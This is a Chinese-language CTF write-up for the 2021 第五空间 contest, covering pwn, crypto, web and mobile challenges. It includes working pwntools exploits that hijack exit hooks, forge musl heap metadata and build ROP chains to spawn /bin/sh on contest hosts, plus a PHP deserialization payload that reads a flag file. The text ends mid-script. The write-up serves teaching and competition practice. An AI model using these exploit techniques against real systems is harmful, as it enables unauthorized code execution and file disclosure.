2021 第五空间 Writeup By Xp0int xp0int Posted on Nov 20 2021 2021 第五空间 Writeup By Xp0int ## 1. PWN ### 1.1 CrazyVM *(*(ptr+0xa8)+0x10)上的数据为libc附近的地址,可以用来算出onegadget和exithook的地址,利用add和shl进行数据的写入,最后劫持exithook写入onegadget ``` from pwn import * context(os='linux', arch='amd64',log_level='debug') p=remote("114.115.221.217",49153) #p=process("./CrazyVM") se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr)) # 0x7f000000002ec000 ->0x80 # now *0x80 has libc payload1=p64(0x0e10030109)+p64(0x9b10020102)+p64(0x0e10030109)+p64(0x1110030002)+p64(0x0011030413) # -0x1260c2 payload2=p64(0x1010020003)+p64(0x1210020102)+p64(0x0810030109)+p64(0x5f10020102)+p64(0x0810030109)+p64(0x3210020102) # *0x88=*0x88 - *0x80 now onegadget in *0x88 and store to 0x40 payload3=p64(0x1011030003)+p64(0x1108030002) # *0x88 = 0x323f60 *0x80=*0x80+*0x88 *(exithook)=onegadget payload4=p64(0x1010020003)+p64(0x7f10020102)+p64(0x3810030109)+p64(0x1111030003)+p64(0x3211020102)+p64(0x0811020109)+p64(0x3f11020102)+p64(0x0811020109) payload4+=p64(0x6011020102)+p64(0x1110030002)+p64(0x1111030003)+p64(0x0811030002)+p64(0x0011030412) sla("vm: ",payload1+payload2+payload3+payload4) #debug_pause() # b *$rebase(0xD823) sla("vm: ","a"*0x100) p.interactive() # remote # 0xe6c7e execve("/bin/sh", r15, r12) # constraints: # [r15] == NULL || r15 == NULL # [r12] == NULL || r12 == NULL # 0xe6c81 execve("/bin/sh", r15, rdx) # constraints: # [r15] == NULL || r15 == NULL # [rdx] == NULL || rdx == NULL # 0xe6c84 execve("/bin/sh", rsi, rdx) # constraints: # [rsi] == NULL || rsi == NULL # [rdx] == NULL || rdx == NULL ``` flag: `flag{b30c1a985e265121947d997582645441}` ### 1.2 notegame edit 处可以溢出 8 个字节。 首先重用覆盖有非零字符的堆块,通过 view 功能泄露 Info 指针,得到 libc 地址;然后利用堆溢出将堆块的 header 清零,伪造 meta 并释放到 active bin 中。最后通过控制 fake meta 使 __malloc_replaced 为非空,修改 ofl_head 为 fake stdout ,调用 exit 执行 system("/bin/sh") getshell。 ``` from pwnX import * p_run("114.115.152.113:49153") p_run("./notegame") def add(size, ctx): p_sl("AddNote", "Note@Game:~$") p_sl(size, ":") p_s(ctx, ":") def edit(idx, ctx): p_sl("EditNote", "Note@Game:~$") p_sl(idx, ":") p_sl(ctx, ":") def free(idx): p_sl("DelNote", "Note@Game:~$") p_sl(idx, ":") def view(): p_sl("ViewInfo", "Note@Game:~$") def update(s, name, info): p_sl("UpdateInfo", "Note@Game:~$") p_sl(s, ":") p_s(name, ":") p_sl(info, ":") def temp(addr, ctx): p_sl("TempNote", "Note@Game:~$") if addr: p_sl(addr, ":") p_sl(ctx, ":") def gift(addr): p_sl("B4ckD0or", "Note@Game:~$") p_sl(addr, ":") add(0x20, "A"*0x20) for i in range(7): add(0x30, 'A'*0x30) free(1) update(0x10, 'a'*0x10, "aaaa") view() libc_addr(p_rec(6, beg="aaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAA", israw=1, check=1), 0xb7c90) gift(libc_os(0xB4AC0)) secret = p_rec(8, beg="Mem: ", israw=1, check=1) sizeclass = 6 fake_mem = libc_os(0xb78c0) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next fake_mem, # meta->mem 0, # meta->avail_mask, meta->freed_mask (sizeclass << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0xdeadbeef000, fake_meta) add(0x60-4, "\n") add(0x60-4, "\n") edit(1, NUL*0x50+p64(0xdeadbeef008)) free(8) malloc_replaced = libc_os(0xB6F84) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next malloc_replaced+4-0x10, # meta->mem 1, # meta->avail_mask, meta->freed_mask (0 << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0, fake_meta) # ~ p_ins("b malloc") add(0x68, '\n') fake_mem = libc_os(0xB6E48) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next fake_mem-0x10, # meta->mem 1, # meta->avail_mask, meta->freed_mask (0 << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0, fake_meta) stdout = flat({ 0: b"/bin/sh\x00", 0x20: 1, # f->wpos 0x28: 1, # f->wend 0x48: libc_os(0x50A90), # f->write }, filler=NUL) add(0x68, libc_osp(0xB6E48+8)+stdout+NL) p_sl("Exit") p_go() ``` FLAG: `flag{9674ab36b62e6b308973ef92c2922b6e}` ### 1.3 bountyhunter 简单栈溢出,溢出执行system("/bin/sh") ``` from pwn import * context(os='linux', arch='amd64',log_level='debug') #context.terminal =['tmux', 'splitw', '-h'] p=remote("139.9.123.168",32548) #p=process("./hunter") elf=ELF("./hunter") #libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr)) rop= '\x00'*0x90+p64(0)+p64(0x40120b)+p64(0x403408)+p64(elf.symbols["system"]) sla("want?",rop+'\n') p.interactive() ``` FLAG: `flag{GXaawi8DwieSxP4IeolLCSWLTe0G}` ## 2. Crypto ### 2.1 ecc ``` # 前两个ecc就用PolligHellman就能解出来 # 剩下最后一个用smart's attack # 参考论文[**https://wstein.org/edu/2010/414/projects/novotney.pdf**]( from sage.all import * from Crypto.Util.number import long_to_bytes,bytes_to_long # Define the curve p = 146808027458411567 a = 46056180 b = 2316783294673 # Generator g_x = 119851377153561800 g_y = 50725039619018388 F = FiniteField(p) E = EllipticCurve(F,[a,b]) G = E.point((g_x, g_y)) n = G.order() print(n.factor()) ''' 2^2 * 7 * 193 * 110603 * 122811083 ''' primes = [4 , 7 , 193 , 110603 , 122811083] x=22306318711744209 y=111808951703508717 C = E.point((x, y)) dlogs = [] for fac in primes: t = int( n // fac ) dlog = discrete_log( t*C , t*G, operation='+' ) dlogs += [dlog] print("factor:"+str(fac)+",Discrete Log:"+str(dlog)) nC = crt(dlogs,primes) print(long_to_bytes(nC)) # 第二条曲线跟第一条曲线是一样的 就不再抄一遍了 from Crypto.Util.number import long_to_bytes p = 0xd3ceec4c84af8fa5f3e9af91e00cabacaaaecec3da619400e29a25abececfdc9bd678e2708a58acb1bd15370acc39c596807dab6229dca11fd3a217510258d1b A = 0x95fc77eb3119991a0022168c83eee7178e6c3eeaf75e0fdf1853b8ef4cb97a9058c271ee193b8b27938a07052f918c35eccb027b0b168b4e2566b247b91dc07 B = 0x926b0e42376d112ca971569a8d3b3eda12172dfb4929aea13da7f10fb81f3b96bf1e28b4a396a1fcf38d80b463582e45d06a548e0dc0d567fc668bd119c346b2 E =EllipticCurve(GF(p),[A,B]) g_x = 10121571443191913072732572831490534620810835306892634555532657696255506898960536955568544782337611042739846570602400973952350443413585203452769205144937861 g_y = 8425218582467077730409837945083571362745388328043930511865174847436798990397124804357982565055918658197831123970115905304092351218676660067914209199149610 G = E.point((g_x, g_y)) x=964864009142237137341389653756165935542611153576641370639729304570649749004810980672415306977194223081235401355646820597987366171212332294914445469010927 y=5162185780511783278449342529269970453734248460302908455520831950343371147566682530583160574217543701164101226640565768860451999819324219344705421407572537 C = E.point((x, y)) def HenselLift(P,p,prec): E = P.curve() Eq = E.change_ring(QQ) Ep = Eq.change_ring(Qp(p,prec)) x_P,y_P = P.xy() x_lift = ZZ(x_P) y_lift = ZZ(y_P) x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6') f(a1,a2,a3,a4,a6,x,y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6 g(y) = f(ZZ(Eq.a1()),ZZ(Eq.a2()),ZZ(Eq.a3()),ZZ(Eq.a4()),ZZ(Eq.a6()),ZZ(x_P),y) gDiff = g.diff() for i in range(1,prec): uInv = ZZ(gDiff(y=y_lift)) u = uInv.inverse_mod(p^i) y_lift = y_lift - u*g(y_lift) y_lift = ZZ(Mod(y_lift,p^(i+1))) y_lift = y_lift+O(p^prec) return Ep([x_lift,y_lift]) def SmartAttack(P,Q,p,prec): E = P.curve() Eqq = E.change_ring(QQ) Eqp = Eqq.change_ring(Qp(p,prec)) P_Qp = HenselLift(P,p,prec) Q_Qp = HenselLift(Q,p,prec) p_times_P = p*P_Qp p_times_Q=p*Q_Qp x_P,y_P = p_times_P.xy() x_Q,y_Q = p_times_Q.xy() phi_P = -(x_P/y_P) phi_Q = -(x_Q/y_Q) k = phi_Q/phi_P k = Mod(k,p) return k long_to_bytes(SmartAttack(G,C,p,8)) ``` FLAG: `flag{025ab3d9-2521-4a81-9957-8c3381622434}` ### 2.2 secrets  ``` import random, hashlib from Crypto.Util.number import * from Crypto.Cipher import AES enc_flag = 0xbf550e796d6efc92e8543ffcbb8d81fd588900f8f7aecaeeee718d60eaace3bc a = [6208495304507502877592974397978564449062722480435998477821753565334623511793847345749111308898139670628857817327159494561065840693449298616913891952427947, 4428365792626193951517975036630823002373517124620690551190165499794155382003347632615508488697880129516880024881940903287205636949002132541035487795791827, 4718311857821047798142460474602800502374374326300654458450570361490723801361197812174259099714079434910279510299556693616702570294307587124784370853830179] p = 12974234240047250882827277463970749648223428465145328709918053842153820677294215343957019413719473165129078971772191068642653862027980142472460705711018201 c = 8024639827831958040886215528711059283414630802186262470325506233115495366865722141662305750597559580380055075908821369972992187624854877285935207126822671 i = 128 R = 2**i M = Matrix([[1,0,0,0,a[0] * R],[0,1,0,0,a[1] * R],[0,0,1,0,a[2] * R],[0,0,0,1,-c * R],[0,0,0,0,p * R]]) L = M.BKZ() s3 = gcd(L[0][0],abs(L[0][1])) s1 = abs(L[0][1]) // s3 s2 = sqrt(abs(L[0][0]) // s3 // s3) secrets = [s1,s2,s3] key = hashlib.sha256(str(secrets).encode()).digest() cipher = AES.new(key, AES.MODE_ECB) flag = cipher.decrypt(long_to_bytes(enc_flag)) ``` flag: `flag{r1t679af2aq9fgu6e2nc5zg7hpdm6mm8}` ### 2.3 signin ``` # plaidCTF 2021里面的那个xorsa改了一下 # 把给出来的p ^ q 的位数减少到了400位 # 依旧可以用bfs得到p的低400左右的位数 # 然后coppersmith method即可 p一共就512位 from Crypto.Util.number import * from tqdm import tqdm c = 41079136228776331983513986502894911009747944746334405367181525535644429164244074690458675696682154772257649811625401364517966224711291000199478649309514306511977247475050430881892635166215911325729515065570801798281126631754714292634605360578171629351703909902943766832088848829679735266081587467028354629832 e = 65537 n = 88873300622677925132392673651975872286851841516213062658793503010409158793653030553313986481205677326846210604582870123515082097235868012724220463515351466605298734168814756198761860328588678124560858545154560701982246840286690871368569184620040790812223630254910190657002367120010677907467764741789052920477 x = bin(138384108215091704603441412066611031482512354164750119910659929381838248956079740784293945420743011870999379776464932828)[2:] P = [] def find(guessp,i): p = int(guessp,2) q = int(x[-i:],2) ^^ p if (q * p) % 2 ** i == n % 2 ** i: if i == 399: P.append(p) else: find('1'+guessp,i+1) find('0'+guessp,i+1) find('1',1) print(len(P)) pbits = 512 for i in tqdm(range(len(P))): _p = P[i] kbits = 512 - len(bin(_p)[2:]) R.<x> = Zmod(n)[] f = P[i] + x * 2^len(bin(_p)[2:]) f = f.monic() roots = f.small_roots(X=2^kbits,beta=0.4) if roots: p = int(_p + roots[0]* 2^len(bin(_p)[2:])) print(_p + roots[0]* 2^len(bin(_p)[2:])) break q = n // p assert p * q == n phi = (q - 1) * (p - 1) d = inverse_mod(e,phi) long_to_bytes(pow(c,d,n)) ``` FLAG: `flag{303clm4z-24p4-t52k-xaz2-d4zgp506tusv}` ### 2.4 doublesage ``` # 就是两层lwe..... 直接当成lwe做就好了 # 手动把远程给的向量和矩阵扔进下面的脚本里 把跑出来的向量传给服务器就行了 from sage.modules.free_module_integer import IntegerLattice def BabaisClosestPlaneAlgorithm(L, w): G, _ = L.gram_schmidt() t = w i = L.nrows() - 1 while i >= 0: w -= round( (w*G[i]) / G[i].norm()^2 ) * L[i] i -= 1 return t - w p = 227 M = Matrix([[55,78,211,140,203,28,205,71,148,55,43,66,34,108,99,6,202,138,90,77,128,85,88,189,135,42,157,159,204,51,211,77,2,64,60,137,53,29,214,153,142,138,0,148,53,115,73,178,78,81,219,103,23,64,146,61,98,86,157,102,222,219,2,69,65,183,93,208,156,80,164,70,200,106,128,123,1,29,175,224,62,166,62,122,102,21,3,166,41,26,164,78,199,194,56,82,6,135,99,107,104,178,32,12,57,205,63,14,159,145,133,19,96,145,20,172,49,213,200,111,148,5,45,6,25,19,81,199,52,119,10,12,101,140,189,61,190,168,23,181,74,153,111],[168,115,109,184,137,28,38,86,70,99,113,24,148,189,43,211,9,3,139,50,120,39,192,179,92,193,96,100,124,22,214,81,216,80,55,208,184,145,132,133,177,84,64,164,121,87,191,134,38,28,2,168,66,194,117,215,83,146,217,224,54,9,188,175,39,45,18,89,68,76,20,226,155,58,70,97,209,135,210,85,108,184,7,92,226,187,205,2,88,71,92,187,186,90,182,14,58,98,32,104,141,29,131,200,85,44,30,159,4,33,113,33,49,201,54,31,158,75,225,109,30,95,142,35,204,55,203,215,156,224,2,171,87,183,175,178,168,22,24,201,28,3,20],[152,97,15,188,52,6,149,182,167,134,60,31,154,36,6,209,28,221,144,88,161,144,13,162,90,110,95,216,196,44,133,124,75,218,170,14,84,186,127,142,59,3,185,132,147,63,121,100,10,88,103,145,3,47,179,127,127,150,133,120,90,84,186,140,21,49,93,167,70,140,161,196,29,207,128,217,125,214,28,211,66,44,33,118,166,43,220,131,26,209,108,171,41,205,163,62,20,127,184,7,95,18,125,66,94,26,33,40,68,49,197,111,46,215,97,204,98,69,206,225,193,116,43,85,153,61,184,178,195,220,127,164,168,45,42,22,104,194,19,0,111,138,191],[54,169,0,103,88,221,86,108,36,171,128,139,198,103,154,83,193,115,84,41,84,136,75,90,20,109,219,22,107,180,136,13,203,98,133,141,57,181,139,226,161,25,21,198,3,200,17,63,223,165,54,74,76,84,189,89,84,95,191,168,91,141,109,148,186,40,5,113,0,71,167,54,29,219,55,64,3,162,34,56,138,109,65,174,43,20,158,22,175,93,136,26,193,60,180,216,24,185,56,86,205,123,31,126,120,84,47,67,165,36,217,153,192,121,142,120,153,39,188,209,119,35,223,155,49,200,215,187,10,111,138,116,223,49,14,127,100,61,197,134,143,164,192],[125,88,118,197,140,200,191,110,135,76,71,33,223,183,34,100,16,53,190,153,185,201,91,118,118,51,10,214,142,223,77,215,11,1,109,166,210,32,63,129,109,146,9,68,28,224,73,43,159,35,185,100,126,218,88,90,111,79,177,54,149,31,86,82,203,11,104,211,200,205,75,226,220,36,31,177,191,200,210,92,60,92,40,96,23,129,99,209,57,55,224,12,154,200,118,25,168,27,28,93,91,175,107,35,22,123,110,86,87,62,149,79,116,28,125,164,114,88,217,80,199,211,113,20,29,68,124,141,157,11,160,85,189,223,135,77,186,172,11,55,40,125,187],[32,42,151,123,149,215,156,87,47,27,160,145,114,118,78,113,205,152,173,92,109,62,185,201,149,216,220,72,208,55,78,1,56,177,147,30,68,223,194,126,155,59,24,10,26,8,104,211,214,119,208,141,188,65,82,130,173,190,107,156,57,157,16,72,43,154,174,52,7,22,39,163,219,134,9,49,20,75,189,182,161,32,82,15,10,22,46,33,145,120,161,216,6,185,131,226,56,53,219,173,150,94,93,10,64,99,124,195,207,220,96,80,207,155,193,223,68,166,99,189,67,78,222,15,76,35,206,19,114,149,1,141,63,20,145,56,214,212,44,186,88,141,204],[114,4,210,127,90,181,97,17,51,156,182,58,167,185,111,54,67,137,213,165,219,211,143,4,65,129,91,190,67,180,163,29,221,185,100,225,103,190,133,208,90,11,123,141,174,93,18,177,124,146,50,107,25,64,219,63,44,186,152,14,25,141,107,188,106,168,136,94,154,6,41,168,193,137,92,179,203,36,85,213,138,149,225,62,89,78,10,180,25,155,38,223,82,221,190,223,42,144,186,49,169,45,161,137,152,180,152,77,97,222,104,98,167,88,116,174,67,75,81,119,205,3,180,24,159,190,102,157,199,152,145,146,131,208,58,121,178,95,211,214,163,196,104],[32,174,189,30,141,182,192,20,103,100,191,80,151,124,185,166,41,32,39,34,169,35,80,108,89,67,150,16,109,8,102,122,85,224,175,115,104,20,116,112,192,66,173,212,29,19,102,66,116,37,146,19,102,65,98,187,0,142,56,192,143,91,20,193,183,107,215,144,184,57,193,86,50,65,220,129,51,212,78,16,91,190,37,116,102,120,178,56,193,146,218,64,142,178,225,207,129,110,104,170,156,148,182,91,220,207,193,124,45,98,57,96,38,67,99,97,149,7,181,138,192,220,195,14,99,152,38,70,186,8,123,204,127,1,39,181,159,75,122,54,41,137,41],[115,170,6,225,99,21,139,118,133,16,175,94,163,163,222,67,220,75,215,142,8,167,86,20,94,7,169,5,145,208,213,153,38,202,191,10,66,133,92,91,95,28,38,86,127,215,3,206,67,170,14,153,108,219,0,10,64,78,74,223,199,180,16,13,169,109,224,213,142,65,12,29,100,109,104,102,131,24,202,92,70,11,215,41,35,112,39,10,182,131,120,95,112,49,116,81,43,49,54,30,225,63,167,16,118,75,193,50,125,224,161,127,186,88,196,3,0,215,219,217,168,221,206,63,86,133,153,216,16,152,39,19,183,155,200,80,33,48,150,104,193,137,189],[19,127,92,102,59,196,66,49,7,211,120,87,95,196,93,17,195,184,187,87,0,151,169,150,82,67,24,85,12,77,20,10,211,203,57,181,156,148,195,123,90,135,14,200,226,135,17,208,15,176,168,140,161,217,2,125,91,167,157,118,100,167,148,155,114,208,159,123,136,95,89,170,21,130,82,10,47,136,88,45,224,23,55,207,200,124,123,113,105,67,80,147,55,127,200,158,209,10,53,135,100,161,27,154,2,80,174,95,12,73,154,17,92,106,206,85,171,69,56,212,213,211,221,166,72,188,78,113,147,26,148,141,41,96,81,31,95,169,164,7,134,125,174],[158,177,225,122,164,132,16,150,170,166,67,2,192,194,28,104,59,148,150,106,179,217,159,94,107,217,209,225,226,39,138,219,163,116,48,40,63,140,8,139,38,144,63,94,205,210,186,217,214,141,22,186,198,114,211,219,82,34,122,92,34,182,156,170,58,41,150,36,212,197,38,131,28,110,48,224,19,109,185,142,186,14,126,156,105,33,79,93,162,183,156,135,43,144,114,8,158,102,145,194,26,29,183,205,219,196,207,142,176,21,225,50,36,22,176,100,40,125,120,114,74,34,176,98,121,77,116,200,85,96,167,63,215,80,1,218,94,29,65,202,42,45,114],[130,124,40,71,145,69,216,122,162,57,134,79,103,8,137,110,8,103,216,172,74,219,141,99,78,104,143,110,130,49,45,54,160,15,196,67,109,208,30,21,195,46,91,38,52,115,173,77,87,111,215,100,91,220,21,4,34,203,173,9,171,129,170,202,9,185,47,198,141,90,216,156,215,99,99,185,194,217,171,155,189,54,14,7,162,173,58,79,34,103,137,208,62,165,104,143,80,33,136,39,111,176,202,207,3,15,173,139,50,49,9,165,170,78,154,180,45,153,40,157,94,73,86,207,26,199,152,12,62,192,175,60,136,96,31,171,114,8,95,17,87,39,177],[51,36,34,69,152,211,6,89,157,60,65,58,78,22,92,23,172,105,12,218,154,171,96,201,41,53,204,215,23,211,216,98,80,45,90,27,177,9,74,169,23,197,221,74,119,152,158,180,73,138,192,149,37,147,80,26,154,180,97,208,130,165,41,180,176,160,20,155,149,213,181,81,62,173,108,80,86,182,35,209,190,217,187,180,201,225,112,125,95,118,48,137,96,79,127,206,49,85,143,139,200,194,49,6,208,109,5,197,75,150,134,194,0,191,72,16,101,4,85,178,131,52,94,139,140,42,14,14,178,94,60,175,16,179,216,14,154,220,136,176,42,145,71],[11,190,138,143,159,121,173,115,63,200,179,44,222,85,202,143,118,197,66,100,116,18,180,77,86,175,32,158,43,133,0,214,162,118,71,224,78,175,82,206,136,137,135,41,146,130,55,42,38,115,165,53,105,189,27,86,61,98,189,7,164,152,188,132,97,2,89,210,14,131,81,11,193,164,174,180,166,112,162,197,27,27,80,120,70,98,197,29,172,88,207,76,81,205,92,37,25,189,66,94,108,222,152,93,116,141,176,72,111,171,204,146,118,5,185,39,171,180,124,78,208,142,85,120,217,61,177,39,77,57,164,139,147,171,149,111,152,168,191,33,98,11,180],[153,44,17,75,199,75,208,31,100,124,210,206,174,223,216,194,156,157,213,101,212,117,162,194,38,184,118,126,10,92,168,197,78,113,71,154,43,177,202,115,27,34,174,54,201,97,112,180,169,32,134,160,104,183,0,145,179,106,156,182,213,214,144,43,226,191,66,34,217,187,137,40,103,194,103,217,13,87,84,151,225,190,26,100,101,30,79,173,207,32,32,150,195,105,162,78,61,16,32,151,4,59,50,219,220,133,13,31,104,122,93,181,5,150,188,25,222,77,111,2,41,12,129,138,107,74,30,145,21,165,192,115,119,118,112,223,74,76,167,167,218,80,121]]) P = [[0 for _ in range(143)] for _ in range(143)] for i in range(143): P[i][i] = p M = M.stack(Matrix(P)) lattice = IntegerLattice(M, lll_reduce=True) c = vector([158,93,224,147,157,86,28,224,141,124,150,117,110,88,186,115,109,119,166,206,210,89,28,63,110,16,156,125,122,201,147,185,53,211,46,1,100,217,69,12,147,64,136,20,88,198,43,110,126,101,113,81,170,190,93,82,10,217,184,32,39,18,184,214,24,190,78,152,160,62,152,38,214,16,37,28,125,51,20,54,91,220,214,47,95,113,140,226,133,185,11,214,207,189,94,92,223,34,61,168,191,163,152,203,201,215,106,180,114,140,198,177,215,201,208,152,221,0,59,147,205,3,181,104,199,205,27,145,51,105,83,17,32,221,214,194,193,148,65,20,183,102,174]) '['+str(BabaisClosestPlaneAlgorithm(lattice.reduced_basis, c))[1:-1]+']' ``` FLAG: `flag{tdhOh8zCMmH5m4i8bKUeTqhFdWQH}` ## 3. Web ### 3.1 WebFTP 从github搞到源码(https://github.com/wifeat/WebFTP)进行分析  发现存在测试功能页面Readme/mytz.php  通过这里可以看到phpinfo,在全局变量中找到flag flag{g28F28EPTjRoxM9sNBDtMS3ZPuIPXL6A} ### 3.2 pklovecloud 题目直接给了源码 ``` <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct() { $this->cinder = new pkshow; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name(); } } class ace { public $filename; public $openstack; public $docker; function echo_name() { $this->openstack = unserialize($this->docker); $this->openstack->neutron = $heat; if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } if (isset($_GET['pks'])) { $logData = unserialize($_GET['pks']); echo $logData; } else { highlight_file(__file__); } ?> ``` 分析可知链为echo $logData触发__toString,然后执行ace类的echo_name函数,绕过判断即可读取文件flag.php,payload如下 ``` <?php // include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct() { $this->cinder = new ace; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name(); } } class acd #自己定义一个类进行序列化绕过$this->openstack->neutron === $this->openstack->nova的判断 { public $neutron; public $nova; function __construct() { $this->neutron= "a"; $this->nova="a"; } } class ace { public $filename; public $openstack; public $docker; public $heat='a';#绕过判断 function __construct() { $this->filename="flag.php"; $this->docker=serialize(new acd()); } function echo_name() { $this->openstack = unserialize($this->docker); if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } $a=serialize(new acp()); $b=urlencode(($a)); echo $b; #O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A4%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A55%3A%22O%3A3%3A%22acd%22%3A2%3A%7Bs%3A7%3A%22neutron%22%3Bs%3A1%3A%22a%22%3Bs%3A4%3A%22nova%22%3Bs%3A1%3A%22a%22%3B%7D%22%3Bs%3A4%3A%22heat%22%3Bs%3A1%3A%22a%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D ``` 右键得到flag  ## 4. Mobile ### 4.1 capp 从capp.apk提取出app.exe,将app.exe拖进ida,f5后将伪代码复制另存为cpp文件,编译为exe方便windows上debug ``` #define _CRT_SECURE_NO_WARNINGS #include <cstdio> #include <cstdlib> unsigned char input[38] = { 0 }; unsigned char ctr = 0; char my_getchar() { return input[ctr++]; } int main(int argc, const char** argv, const char** envp) { int result; // w0 long long v4; // [xsp+0h] [xbp+0h] BYREF int* v5; // [xsp+20h] [xbp+20h] long long v6; // [xsp+28h] [xbp+28h] int v7; // [xsp+34h] [xbp+34h] int i; // [xsp+38h] [xbp+38h] int j; // [xsp+3Ch] [xbp+3Ch] v7 = 1000; v6 = 999LL; // v5 = (int *)(4 * (((unsigned __int64)&v4 + 3) >> 2)); v5 = (int*)malloc(4 * 10000); i = 0; // slogan(); scanf("%s", (char*)input); for (i = 0; i < v7; ++i) v5[i] = 0; for (j = 43; v5[j]; --v5[j]) ; ++j; --j; ++j; while (v5[j]) --v5[j]; for (j -= 43; v5[j]; --v5[j]) ; for (j += 42; v5[j]; --v5[j]) { ++v5[++j]; j -= 43; ++v5[j]; j += 42; } ++j; while (v5[j]) { ++v5[--j]; --v5[++j]; } --j; ++j; --j; while (v5[j]) --v5[j]; 省略2000多行。。 ``` 调试时发现,从第5位输入开始依次异或5,6,7,8··· 猜测输入下方即为比较值,依次异或5、6、7、8···还原即可 ``` ''' 000001493B9FC210 00 00 00 00 26 00 00 00 62 00 00 00 62 00 00 00 ....&...b...b... 输入 000001493B9FC220 62 00 00 00 62 00 00 00 62 00 00 00 67 00 00 00 b...b...b...g... 000001493B9FC230 64 00 00 00 65 00 00 00 6A 00 00 00 6B 00 00 00 d...e...j...k... 000001493B9FC240 68 00 00 00 69 00 00 00 6E 00 00 00 6F 00 00 00 h...i...n...o... 000001493B9FC250 6C 00 00 00 6D 00 00 00 72 00 00 00 73 00 00 00 l...m...r...s... 000001493B9FC260 70 00 00 00 71 00 00 00 76 00 00 00 77 00 00 00 p...q...v...w... 000001493B9FC270 74 00 00 00 75 00 00 00 7A 00 00 00 7B 00 00 00 t...u...z...{... 000001493B9FC280 78 00 00 00 79 00 00 00 7E 00 00 00 7F 00 00 00 x...y...~....... 000001493B9FC290 7C 00 00 00 7D 00 00 00 42 00 00 00 43 00 00 00 |...}...B...C... 000001493B9FC2A0 40 00 00 00 41 00 00 00 46 00 00 00 00 00 00 00 @...A...F....... 000001493B9FC2B0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............... 000001493B9FC2C0 01 00 00 00 37 00 00 00 30 00 00 00 33 00 00 00 ....7...0...3... 待比较 000001493B9FC2D0 3E 00 00 00 39 00 00 00 6C 00 00 00 38 00 00 00 >...9...l...8... 000001493B9FC2E0 3E 00 00 00 6C 00 00 00 3D 00 00 00 3E 00 00 00 >...l...=...>... 000001493B9FC2F0 26 00 00 00 25 00 00 00 77 00 00 00 25 00 00 00 &...%...w...%... 000001493B9FC300 27 00 00 00 2D 00 00 00 24 00 00 00 23 00 00 00 '...-...$...#... 000001493B9FC310 2B 00 00 00 2F 00 00 00 7B 00 00 00 79 00 00 00 +.../...{...y... 000001493B9FC320 7D 00 00 00 29 00 00 00 2B 00 00 00 7A 00 00 00 }...)...+...z... 000001493B9FC330 41 00 00 00 47 00 00 00 1A 00 00 00 15 00 00 00 A...G........... 000001493B9FC340 16 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ ''' s = "37 30 33 3E 39 6C 38 3E 6C 3D 3E 26 25 77 25 27 2D 24 23 2B 2F 7B 79 7D 29 2B 7A 41 47 1A 15 16".split() s = [int(_, 16) for _ in s] for i in range(len(s)): s[i] ^= 5 + i print(bytes(s)) # 26460f32a3164e6382436aba45eaf862 ``` FLAG : flag{26460f32a3164e6382436aba45eaf862} ### 4.2 uniapp 解压出apps__UNI__14D1880\www\app-service.js 主要逻辑在这  f["encrypt"](c)调用类似shasha加密的函数,依葫芦画瓢解密即可 ``` iv = [0, 0, 0, 0, 0, 0, 0, 74, 0, 0, 0, 0] key = [_ for _ in range(32)] def _get32(t, e): return t[e] ^ t[e+1] << 8 ^ t[e+2] << 16 ^ t[e+3] << 24 n = 1 _rounds = 20 _sigma = [1634760805, 857760878, 2036477234, 1797285236] _param = [_sigma[0], _sigma[1], _sigma[2], _sigma[3], _get32(key, 0), _get32(key, 4), _get32(key, 8), _get32(key, 12), _get32(key, 16), _get32(key, 20), _get32(key, 24), _get32(key, 28), n, _get32(iv, 0), _get32(iv, 4), _get32(iv, 8)] _keystream = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] _byteCounter = 0 def _rotl(num, e): return (num << e | num >> 32 - e) & 0xffffffff def _quarterround(t, e, n, r, o): print(t) t[e] += 